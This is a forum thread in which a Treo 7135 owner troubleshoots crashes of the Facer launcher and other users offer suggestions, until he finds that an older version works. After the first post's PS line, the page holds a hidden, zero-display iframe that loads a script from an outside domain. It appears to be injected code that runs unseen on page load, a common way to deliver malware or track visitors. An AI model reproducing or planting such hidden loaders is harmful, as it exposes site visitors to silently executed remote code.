Facer - installation on 7135

I would like to try the facer program on my 7135. This forum put me onto the application in the first place. It seems like people have been able to install and use on their 7135 however I'm not able to run the program.

From my standard palm screen I select Facer, I start to see the 'Today' screen but then an alert comes up that is titled 'Fatal Alert' with the message 'Fatal Exeption' the only choice I have is reset which I have to press, phone obviously then resets. Subsequent attempts to start result in more of the same.

Can someone who is using Facer on their 7135 offer some insite into where I've gone wrong?

Regards

Darren

PS Had my 7135 for 2 weeks now.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Hmm, I have no idea why thats happening. I haven't had those problems and I have very few soft resets. Its quite possible that Facer is causing the resets I do have.

Facer

DAS,

Are you using AOL instant messanger or jot? I use Facer all the time and I remember having some problems in the beginning with one of those programs.

Let me know what programs you have installed and we'll see what the culprit is.

Also, what version of Facer are u using?

Scott

I had the same problem you have with Facer... I ended up doing a hard reset and installing Zlauncher instead.

follow up

Just to let everyone know. I was looking through my downloads to see which version I'd downloaded to answer a post from sfvosbury I couldn't find a version number that I'd recorded so went to download again. This time I noticed that I was downloading version 1.7 seem to recall downloading 1.8 previously. Anyway the long and short of it is that 1.7 works. Only thing is that it seems to be very very similar to 'Today' which is free.

Are there any differences that I haven't discovered yet?

Thanks to those who offered suggestions.

Ditto. It was not easy getting rid of Facer.

Maybe we can give the programmer a heads-up about the problems we are having? I love having that Today page.
